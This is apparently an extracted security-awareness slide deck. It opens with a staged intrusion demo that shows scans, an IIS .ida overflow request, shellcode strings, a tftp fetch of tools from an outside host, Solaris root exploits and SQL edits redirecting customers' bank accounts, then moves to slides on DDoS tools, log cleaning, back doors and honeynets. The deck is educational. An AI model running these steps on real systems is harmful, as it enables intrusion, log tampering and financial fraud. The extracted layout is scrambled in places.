Hacking
Hacking
Hacking
hacker.com:~$ nslookup
Default Server: ns.hacker.com
Address: 3.1.33.7
> www.billionaireshow.com
Non-authoritative answer:
Name:
www.billionaireshow.com
Address:
172.16.16.5
> exit
hacker.com:~$ nmap -sS 172.16.16.5
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on www.billionaireshow.com (172.16.16.5):
(The 1514 ports scanned but not shown below are in state: closed)
Port
80/tcp
135/tcp
139/tcp
445/tcp
1080/tcp
8080/tcp
State
open
open
open
open
open
open
Service
http
loc-srv
netbios-ssn
microsoft-ds
socks
http-proxy
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Content-Length: 2506
Date: Mon, 01 Oct 2001 15:04:41 GMT
Content-Location:
http://172.16.16.5/postinfo.html
Content-Type: text/html
Server: Microsoft-IIS/5.0
Accept-Ranges: bytes
Last-Modified: Mon, 01 Oct 2001 11:06:52
GMT
ETag: "20c1bf347cfc01:941"
Connection closed by foreign host.
hacker.com:~$ ./idaexploit.sh 172.16.16.5
Connecting . . .
Dumping Shell:
\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x=
1c\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04\x90\x90\x90\xac\=
x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c=
\x6b\xbd\xd9\x99\x14\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4=
\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9\x99\xcf\x14\x2c\x6=
8\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x=
99\x99\x14\x2c\x6c\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf\=
xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf\xd9\x99\x34\xc9\x66=
\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x9=
9\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x=
99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\=
x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99=
\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99\x89\x99\x99\x99\x9=
9\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x90\x90\x90\x=
90\x90\x90\x90\x90
Done...
Completing...
...
GET /test.ida?`perl -e 'print "N"x230'`
%u0101%u00b5%u0101%u00b5%u0101%u00b=5%u0101%u00b5=3Dx HTTP/1.0
...
GET /test.ida?`perl -e 'print "N"x230'`%u0abf%u00b6%u0abf%u00b6%u0abf%u00b6=
%u0abf%u00b6=3Dx HTTP/1.0
...
yahoo: `perl -e 'print "\x90"x11800'`$SHELLCODE=20
ini.TINY:
Binding cmd.exe: PORT 80...
Finished...ENJOY!
C:\WINNT\system32>
C:\WINNT\system32> cd ..
C:\WINNT> dir
Volume in drive C has no label.
Volume Serial Number is 6446-0F57
Directory of C:\WINNT
08/24/2001
08/24/2001
12/06/1999
12/06/1999
12/06/1999
09/07/2001
12/06/1999
07/21/2000
07/21/2000
09/28/2001
12/06/1999
12/06/1999
07:23p
07:23p
05:00p
05:00p
05:00p
02:00p
05:00p
12:05p
12:05p
04:41p
05:00p
05:00p
36 vb.ini
37 vbaddin.ini
20,240 vmmreg32.dll
366,864 welcome.exe
23 welcome.ini
348 win.ini
256,192 winhelp.exe
269,584 winhlp32.exe
193,296 winrep.exe
288,880 WMSysPrx.prx
9,522 Zapotec.bmp
707 _default.pif
70 File(s)
3,934,990 bytes
29 Dir(s) 7,330,738,176 bytes free
C:\WINNT\system32>
C:\WINNT\system32> tftp.exe -i hackerbox.com GET nmap.exe c:\temp\nmap.exe
C:\WINNT\system32 cd \temp
>
C:\temp>
nmap sP 172.16.16.1-255
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/)
Host www.billionaireshow.com (172.16.16.5) appears to be up.
Host itguy.billionaireshow.com (172.16.16.176) appears to be up.
Nmap run completed -- 255 IP addresses (2 host(s) up) scanned in 7 second
C:\temp>
open
open
open
open
ftpd
ssh
lockd
dtspc
Exploit Starting...
\x31\xc0\x99\x52\x52\xb0\x17\xcd\x80\x68\xcc\x73\x68\xcc\x68
\xcc\x62\x69\x6e\xb3\x2e\xfe\xc3\x88\x1c\x24\x88\x5c\x24\x04
\x88\x54\x24\x07\x89\xe6\x8d\x5e\x0c\xc6\x03\x2e\x88\x53\x01
\x4e\x0c\x52\x51\x56\x52\xb0\x3b\xcd\x80\xc9\xc3\x55\x89\xe5
\x83\xec\x08\xeb\x12\xa1\x3c\x50\x90
Exploit finished.. ENJOY!
# whoami
root
#
Solaris 8
Exploit Starting...
\x31\xc0\x99\x52\x52\xb0\x17\xcd\x80\x68\xcc\x73\x68\xcc\x68
\xcc\x62\x69\x6e\xb3\x2e\xfe\xc3\x88\x1c\x24\x88\x5c\x24\x04
\x88\x54\x24\x07\x89\xe6\x8d\x5e\x0c\xc6\x03\x2e\x88\x53\x01
\x4e\x0c\x52\x51\x56\x52\xb0\x3b\xcd\x80\xc9\xc3\x55\x89\xe5
\x83\xec\x08\xeb\x12\xa1\x3c\x50\x90
Exploit finished.. ENJOY!
# whoami
root
# nslookup
Default Server: billionaireshow.com
Address: 172.16.15.2
> ls billionaireshow.com
[billionaireshow.com]
billionaireshow.com.
billionaireshow.com.
billiondollar
ap.billionaireshow.com
game.ec.billionaireshow.com
> exit
#
NS server = ns.billionaireshow.com
NS server = game.ec.billionaireshow.com
MX server = mail.billionaireshow.com
A
172.16.7.14
A
172.16.7.22
Accounts Payable
Solaris 8
Exploit Starting...
\x31\xc0\x99\x52\x52\xb0\x17\xcd\x80\x68\xcc\x73\x68\xcc\x68
\xcc\x62\x69\x6e\xb3\x2e\xfe\xc3\x88\x1c\x24\x88\x5c\x24\x04
\x88\x54\x24\x07\x89\xe6\x8d\x5e\x0c\xc6\x03\x2e\x88\x53\x01
\x4e\x0c\x52\x51\x56\x52\xb0\x3b\xcd\x80\xc9\xc3\x55\x89\xe5
\x83\xec\x08\xeb\x12\xa1\x3c\x50\x90
Exploit finished.. ENJOY!
# whoami
root
# nslookup
Default Server: billionaireshow.com
Address: 172.16.15.2
> ls billionaireshow.com
[billionaireshow.com]
billionaireshow.com.
billionaireshow.com.
billiondollar
ap.billionaireshow.com
game.ec.billionaireshow.com
NS server = ns.billionaireshow.com
NS server = game.ec.billionaireshow.com
MX server = mail.billionaireshow.com
A
172.16.7.14
A
172.16.7.22
> exit
# telnet 172.16.6.14 22
Trying 172.16.16.14...
Connected to 172.16.16.14.
Escape character is '^]'.
SSH-2.0-3.0.0 SSH Secure Shell (non-commercial)
Accounts Payable
Solaris 8
SunOS 5.8
ls
etc
home
proc
vakkk
lost+found root
mnt
sbin
oracle9
tmp
usr
dev
idxs
boot
lib
# sqlplus
SQL> describe accounts
Name
Null?
Type
------------------
--------
-----------
LNAME
FNAME
ADDR1
ADDR2
ZIP
PHONE
SSN
BANK
ROUTING_NUM
ACCOUNT_NUM
ROUTING_NUM
-----------
8811101011
8822822281
4922929481
5594492295
6839186571
3985792816
060101015
060192911
069882211
069592215
062798581
061873710
0985949922
320984581
2092028481
204098285
6096780914
098029820
4098320921
450982091
6098509449
095098209
4090921109
609830329
6987329810
908848828
4987298731
984598472
5098222091
095509860
0983039311
098098571
SQL> update accounts set ACCOUNT_NUM = 0069858915 where LNAME = '*';
SQL> update accounts set ROUTING_NUM = 6695922941 where LNAME = '*';
SQL> select LNAME, ACCOUNT_NUM, ROUTING_NUM from accounts where LNAME = '*';
LNAME
----Young
Varick
Brantley
Weinstein
Davis
Reynard
Halpert
Davis
Kennedy
Scott
Michaels
Noojin
ACCOUNT_NUM
----------- ----------0069858915
0069858915
0069858915
0069858915
0069858915
0069858915
0069858915
0069858915
0069858915
0069858915
0069858915
0069858915
ROUTING_NUM
6695922941
6695922941
6695922941
6695922941
6695922941
6695922941
6695922941
6695922941
6695922941
6695922941
6695922941
6695922941
Hacker Techniques
Disclaimer
Hacking is illegal!
Some actual organizations and computers are
used in the examples,
but only to provide realism
TheStagesofaNetworkIntrusion
1.Scan:
IPaddressesinuse,
operatingsystemisinuse,
openTCPorUDPports
2.Exploit:
DenialofService(DoS)
scriptsagainstopenports
3. GainRootPrivilege:
BufferOverflows
GetRoot/AdministratorPassword
4.InstallBackDoor
5.UseIRC(InternetRelayChat)
27
Reconnaissance
Public information
www
news postings
Network Scanning
Operating System Detection
War-dialing
Network Scanning
Identifies:
accessible machines
servers (ports) on those machines
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
ftp
telnet
time
domain
gopher
finger
http
pop-2
pop-3
sunrpc
auth
imap
login
shell
unknown
nmap -O
War-dialing
Find the organizations modems,
by calling all of its phone numbers
202-324-3000
TheStagesofaNetworkIntrusion
1.Scan:
IPaddressesinuse,
operatingsystemisinuse,
openTCPorUDPports
2.Exploit:
DenialofService(DoS)
scriptsagainstopenports
3. GainRootPrivilege
BufferOverflows
GetRoot/AdministratorPassword
4.InstallBackDoor
5.UseIRC(InternetRelayChat)
35
1)
2)
3)
2)
TFN Sends UDP flood, TCP SYN Flood, ICMP Echo Flood, or a SMURF Attack
Master communicates to daemon using ICMP echo reply, changes IP identification
number and payload of ICMP echo reply to identify type of attack to launch.
3) TFN2k First DDOS for windows. Communication between master and agents
can be encrypted over TCP, UDP, or ICMP with no identifying ports
4) STACHELDRAHT - Combination of Trinoo and TFN
If you are a DDOS victim, at present this is very little you can do about it!!!
TheStagesofaNetworkIntrusion
1.Scan:
IPaddressesinuse,
operatingsystemisinuse,
openTCPorUDPports
2.Exploit:
DenialofService(DoS)
scriptsagainstopenports
3. GainRootPrivilege:
BufferOverflows
GetRoot/AdministratorPassword
4.InstallBackDoor
5.UseIRC(InternetRelayChat)
40
Packet Sniffing
ftp and telnet passwords
e-mail
Lotus Notes
Log cleaners
Start with syslog.conf, edit log files, Wzap wtmp file
Edit shell history file (or disable shell history)
TheStagesofaNetworkIntrusion
1.Scan:
IPaddressesinuse,
operatingsystemisinuse,
openTCPorUDPports
2.Exploit:
DenialofService(DoS)
scriptsagainstopenports
3. GainRootPrivilege:
BufferOverflows
GetRoot/AdministratorPassword
4.InstallBackDoor
5.UseIRC(InternetRelayChat)
52
Back Doors
Back Doors
1. Allows hackers to come back at their leisure.
2. Can exist at application level
Back Orifice
Packet Sniffing
firewall
router
ISP
work station
mail server
Internet
work station
web and ftp
server
work st.
work st.
Destination IP.port
TheStagesofaNetworkIntrusion
1.Scan:
IPaddressesinuse,
operatingsystemisinuse,
openTCPorUDPports
2.Exploit:
DenialofService(DoS)
scriptsagainstopenports
3. GainRootPrivilege:
BufferOverflows
GetRoot/AdministratorPassword
4.InstallBackDoor
5.UseIRC(InternetRelayChat)
57
Hacker Techniques
http://www.zonealarm.com
SNORT http://www.snort.org
http://www.tripwire.com
Honeynets
Honeypots
A security resource whos value lies in being
probed, attacked or compromised.
Has no production value, anything going to
or from a honeypot is likely a probe, attack or
compromise.
Advantages / Disadvantages
Advantages
Reduce false negatives and false positives
Collect little data, but data of high value
Minimal resources
Conceptually simple
Disadvantages
Single point of failure
Risk
What is a Honeynet
High-interaction honeypot
Used primarily to learn about the bad guys.
Network of production systems.
Once compromised, the data collected is used
to learn the tools, tactics, and motives of the
blackhat community.
How it works
A highly controlled network where every
packet entering or leaving is monitored,
captured, and analyzed.
Any traffic entering or leaving the Honeynet
is suspect by nature.
http://project.honeynet.org/papers/honeynet/
Risk
Honeynets are highly complex, requiring
extensive resources and manpower to
properly maintain.
Honeynets are a high risk technology. As a
high interaction honeypot, they can be used
to attack or harm other non-Honeynet
systems.
Legal Issues
Privacy
Entrapment
Liability
Privacy
No single statute concerning privacy
Electronic Communication Privacy Act (18
USC 2701-11)
Federal Wiretap Statute (Title III, 18 USC
2510-22)
The Pen/Trap Statute (18 USC 3121-27)
Entrapment
Used only by defendant to avoid
conviction.
Cannot be held criminally liable for
entrapment.
Applies only to law enforcement
Even then, most legal authorities
consider Honeynets non-entrapment.
Upstream liability